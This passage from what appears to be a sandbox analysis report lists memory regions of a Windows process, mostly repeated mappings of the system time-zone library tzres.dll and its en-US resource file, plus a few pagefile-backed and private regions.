id = 5139
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5140
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5141
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5142
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5143
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5144
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5145
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5146
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5147
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5148
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5149
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5150
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5151
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5152
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5153
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5154
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5155
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5156
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5157
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5158
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5159
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5160
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5161
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5162
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5163
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5164
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5165
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5166
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5167
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5168
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5169
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5170
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5171
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5172
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5173
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5174
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5175
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5176
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5177
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5178
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5179
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5180
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5181
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5182
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5183
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5184
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5185
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5186
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5187
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5188
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5189
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5190
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5191
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5192
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5193
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5194
start_va = 0x190000
end_va = 0x190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5195
start_va = 0x1a0000
end_va = 0x1a6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5196
start_va = 0x190000
end_va = 0x192fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000190000"
filename = ""
Region:
id = 5197
start_va = 0x1a0000
end_va = 0x1a7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001a0000"
filename = ""
Region:
id = 5198
start_va = 0x1250000
end_va = 0x12cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001250000"
filename = ""
Region:
id = 5199
start_va = 0x7fffffac000
end_va = 0x7fffffadfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffac000"
filename = ""
Region:
id = 5362
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5363
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5364
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5365
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5366
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5367
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5368
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5369
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5370
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5371
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5372
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5373
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5374
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5375
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5376
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5377
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5378
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5379
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5380
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5381
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5382
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5383
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5384
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5385
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5386
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5387
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5388
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5389
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5390
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5391
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5392
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5393
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5394
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5395
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5396
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5397
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5398
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5399
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5400
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5401
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5402
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5403
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5404
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5405
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5406
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5407
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5408
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5409
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5410
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5411
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5412
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5413
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5414
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5415
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5416
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5417
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5418
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5419
